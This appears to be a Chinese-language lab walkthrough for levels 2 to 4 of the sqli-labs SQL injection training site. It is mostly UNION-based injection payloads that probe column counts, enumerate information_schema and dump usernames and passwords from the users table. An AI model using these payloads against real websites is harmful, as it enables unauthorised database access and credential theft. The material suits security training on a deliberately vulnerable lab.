目录
sql注入sqli-labs第二关
1、了解表的列数
2、连表查询
3、注入管理员账号密码
sql注入sqli-labs第三关
1、逃脱单引号,括号
编辑
2、了解表的列数
3、连表查询
4、注入管理员账号密码
sql注入sqli-labs第四关
1、逃脱双引号,括号
2、了解表的列数
3、连表查询
4、注入管理员账号密码
sql注入sqli-labs第二关

首先按照第一题进行尝试,再用双引号进行尝试
根据报错信息可以看出并非像第一天一样是字符型注入
可以猜测代码:id=$id的形式
那么和第一关思路相同,都不用引号逃脱了
1、了解表的列数
2、连表查询
3、注入管理员账号密码
1、了解表的列数
id=1 order by 3

id=1 order by 4

可以得到了表的列数
2、连表查询
id=-1 union select 1,2,3

id=-1 union select 1,user(),database()

3、注入管理员账号密码
id=-1 union select 1,2,group_concat(table_name) from information_schema.tables

id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

id=-1 union select 1,2,group_concat(username ,id , password) from users

sql注入sqli-labs第三关
同样用单引号看看报错信息

可以看出代码类似id=('id')
所有在逃脱单引号的同时好要注意括号
1、逃脱单引号,括号
2、了解表的列数
3、连表查询
4、注入管理员账号密码
1、逃脱单引号,括号
id=1')%23
2、了解表的列数
id=1') group by 3%23

id=1') group by 4%23

3、连表查询
id=-1') union select 1,2,3%23

id=-1') union select 1,user(),database()%23

4、注入管理员账号密码
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23
id=-1') union select 1,2,group_concat(username ,id , password) from users%23

sql注入sqli-labs第四关
使用双引号尝试,分析报错

尝试id=1")%24 可以知道代码类似id=("id")

1、逃脱双引号,括号
2、了解表的列数
3、连表查询
4、注入管理员账号密码
1、逃脱双引号,括号
id=1")%24
2、了解表的列数
?id=1") order by 3%23
3、连表查询
?id=-1") union select 1,2,3%23
?id=-1") union select 1,database(),version()%23
4、注入管理员账号密码
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23
?id=-1") union select 1,2,group_concat(username ,id , password) from users%23



















